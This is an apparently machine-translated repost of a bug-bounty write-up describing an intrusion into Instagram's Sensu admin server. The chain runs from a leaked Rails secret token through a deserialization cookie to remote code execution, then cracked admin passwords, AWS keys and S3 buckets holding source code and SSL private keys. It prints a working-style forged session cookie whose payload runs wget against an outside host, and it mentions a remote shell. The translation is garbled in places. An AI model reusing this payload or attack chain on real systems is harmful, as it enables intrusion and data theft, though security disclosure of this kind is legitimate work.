I am the trumpet

http://exfiltrated.com/research-Instagram-RCE.php

0 x00 preface

In 2012, Blloberg famously posted a post on the website of Facebook’s White Hat rewards program saying, “If Facebook had a $1 million bug, we’d be willing to pay for it.” Before I start, I’d like to apologize for the click-duping headline, but Facebook’s comments are an important background for writing this article. After a lot of trial and error, I did find a $1 million Instagram bug that could be used to get Instagram source code, photos, SSL certificates, etc.

0x01 Perfect clue

Last year, I did some small security tests with some success, so I was very interested in testing Facebook’s overall business security in depth. I discovered this bug thanks to the fact that the company I work for allowed me to find other companies’ vulnerabilities outside of working hours, otherwise there would have been no article at all. Here’s the thing: A friend of mine mentioned to me a while ago that they were testing the security of Instagram, a key component of Facebook’s bug rewards program. They found a vulnerable Ruby server at Instagram (Sensu.instagram.com), which my friend told me he had submitted to Facebook’s Vulnerability response team under the “internal management background external” category. In a report he submitted to Facebook, he said there might be a Ruby password reset bug that could be used by hackers to log into the background, though he did not succeed in confirming his suspicions. See the hole details at first glance, I think of the CVE – 2013-3221 (ronin – ruby. Making. IO/blog / 2013/0…). “, but since he had already submitted the bug, my friend asked me privately to help him see if he could exploit it further, amplify the vulnerability and access Instagram’s core data.

0x02 Ruby(Rails) Remote Command Execution

Based on the details of my friend’s bug report, I tried to find a bug that could reset the password of this Ruby application. My initial tests weren’t good, though. The average login page didn’t accept the value ‘0’ as a password, and I had no idea how to send a password reset email. I realized that Instagram probably uses the open source Sensu management system behind it, so I googled “sensu-admin” and found nothing. Well, it looks like my friend’s theory didn’t work.

To my surprise, I found the source code for the app on Github. In the project directory, I found the leaked Rails private key in secret_token.rb. My first thought was, would Facebook’s programmers be stupid enough to build their own backend applications without changing the private key? But I want to try, because if it works, THEN I can fake seesion cookies and log into the background. I also mentioned in front of the CVE – 2013-3221 (ronin – ruby. Making. IO/blog / 2013/0…). , the paper’s authors point out that not only can cookies be forged, but because of the Deserialization vulnerability of Ruby Rails, attackers can even directly construct remote code execution attacks.

Before trying to deserialize the vulnerability to test Instagram’s business, I first tested it locally, using the following testing framework: github.com/charliesome…

Surprisingly well, I managed to replicate the bug locally. So, using the same steps, combined with what I just discovered on Github, I sent the following cookie to Instagram’s Sens-Admin Admin backend server:

#! bash _sensu-admin_session=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5 jZW86CEVSQgY6CUBzcmNJIkFldmFsKCdzeXN0ZW0oIndnZXQgaHR0cDovL2V4ZmlsdHJhdGVkLmNvbS90ZXN0LWluc3RhZ3JhbSIpJykGOgZFVDoMQG1ldGh vZDoLcmVzdWx0--92c614a28526d03a1a31576bf4bb4c6026ef5e1fCopy the code

With a carefully constructed cookie, Instagram’s servers successfully executed the code I sent, decrypted like this:

"wget http://exfiltrated.com/test-instagram"

So, I set up a listening port and uploaded a remote shell file, and the result is as follows:

After I managed to get The Instagram server to execute the command code I sent, I reported the bug to the Facebook team. As I mentioned in my report:

  1. The sens-Admin service used by Facebook uses private keys that are publicly available on the web
  2. Sensu.instagram.com is running the Rails 3.X version, which has a remote code execution vulnerability.

0x03 Fatal weak password

Actually, for me, discovering a remote code execution isn’t that exciting. But I wanted to make sure THAT I was still covered by Facebook’s Bug Rewards program, so I went back to Facebook’s bug Rewards program instructions, which stated that while Facebook strongly discouraged business-disruptive penetration during testing, the response team expressed concern that, Testers are interested if they know they have access to more core data. Well, looking at this, I think my own penetration testing is still within the scope of Facebook’s license.

As mentioned in the previous chapter, ALTHOUGH I managed to get the Facebook server to execute remote code and get the Shell of the server, I did not have access to the UI interface of the backend. As it happens, the Instagram backend stores its admin user data in Postgres DB on the same server, so I managed to get the usernames and passwords for about 60 accounts on the backend. Unfortunately, the password was encrypted, and I’m trying to figure out how to decrypt the data, and here’s the good news. I quickly cracked 12 weak passwords, including “Changme,” “Password,” and “Instagram.” My god! That’s a weak password. So, I logged on to the sensu.instagram.com background screen.

Since Facebook was strongly opposed to business-disrupting infiltration during testing, I took a screenshot and left, submitting it to Facebook’s emergency response team as a new vulnerability.

0x04 Penetrating an Intranet

In my first bug report email, I asked the Facebook team if they could get authorization to infiltrate the network. Because this sensu-Admin server runs on top of EC2, you can see the records of 1,400 systems, large and small, in the etc/host/ folder. So that means I have a good chance of breaking into Instagram.

Facebook didn’t give me a clear answer, though. They also responded at short notice, restricting access to the sensu.instagram.com exterior. So, what exactly infiltrating the network will yield if it continues will remain a mystery forever.

0 x05 gold key

In fact, at this point in my infiltration, I’m pretty happy with my whole infiltration process. I’ve found three solid Instagram bugs, two of which I packaged and submitted to Facebook. Of course, the story doesn’t end there. While penetrating sensu.Instagram.com, I found a file under the server: /etc/sensu/config.json

This configuration file contains authentication credentials for the database and other services. Credentials include an Email account and a bunch of Pagerduty keys. Of course, I focused on AWS key-pair, also listed in the file, which I thought was the next breakthrough point for penetration.

AWS Keys can be used as credentials to log into many different AWS businesses, but my focus is on whether these keys can be used to log into Amazon’S S3 cloud storage service, which would indicate that a lot of sensitive data can be accessed. In this configuration file, I found 82 different cloud storage areas. However, direct access to these cloud storage areas is blocked by the server. I can only see the names of these cloud storage areas, but not the details. One exception, however, is a block named Autoscale-Kitchen.

When I see the words autoscale-kitchen, my first thought is that this is a development server. I found a service installation profile on the server called autoscale-kitchen-latest.tar.gz, along with its previous iterations. I first looked into the latest version of the configuration file to see if there was any sensitive information leaked, and was disappointed. I then looked up a few older versions, and luckily I found a profile called Vagrant in an older version, where I found Instagram’s EC2 key-pair.

I successfully connected to Instagram D’s S3 cloud storage service using the key-pair I just found, and this time, I can get the specific content of each block!!

0x06 Master the Empire

With access to Instagram’s data stored on Amazon’s S3 cloud storage service, I scanned and downloaded several blocks of content.

The next day, I started to look at the data downloaded from the cloud storage service. I found that the data contained the pictures uploaded by users, the text sent and so on. Because Facebook’s Bug Rewards program has limited access to sensitive data, I stopped further penetration of user data. However, I am sure that if we continue to get more data, more sensitive data can be obtained.

I used AWS keypair to get the following information from several other blocks:

Instagram.com statistics, multiple backend source code, and of course, more importantly, SSL certificates and a number of private keys involved in the private apis of Instagram.com, *. Instagram.com and Instagram on other web services, quite literally, I now have the ability to do anything I want to anyone on Instagram.

Once again, I submitted a report to Facebook on seven different security issues, big and small, including:

  1. With AWS certificates, any unauthorized user can log into the sensU management system
  2. AWS storage blocks store certificates that access other blocks and are used for claim attacks.
  3. Sensitive data is not isolated, resulting in a single AWS Key accessing all S3 blocks.
  4. AWS Keys can be logged in by an external IP address. If an attacker is fully capable of clearing server logs, the specific attacker cannot be found after an attack.

0 x07 afterword.

Finally, I’d like to summarize my infiltration into the Instagram empire with a mind map:

It was a bug in remote code execution at sensu.instagram.com, and FROM that BUG I found weak passwords for the backstage employees. Through the configuration file on the sensu.instagram.com server, I obtained THE AWS keypair. Using this keypair, I also read the EC2 AWS keypair from the S3 cloud storage server. Using keypair, I was able to access all of Instagram’s important sensitive data stored on its S3 cloud storage service. The whole penetration test process revealed a number of flaws in Facebook’s security architecture, and I was surprised to see so many low-level security and regulatory issues emerge after so many years of security architecture. Visible, security attack and defense, but also towards a more in-depth direction continued.

[original link] exfiltrated.com/research-In…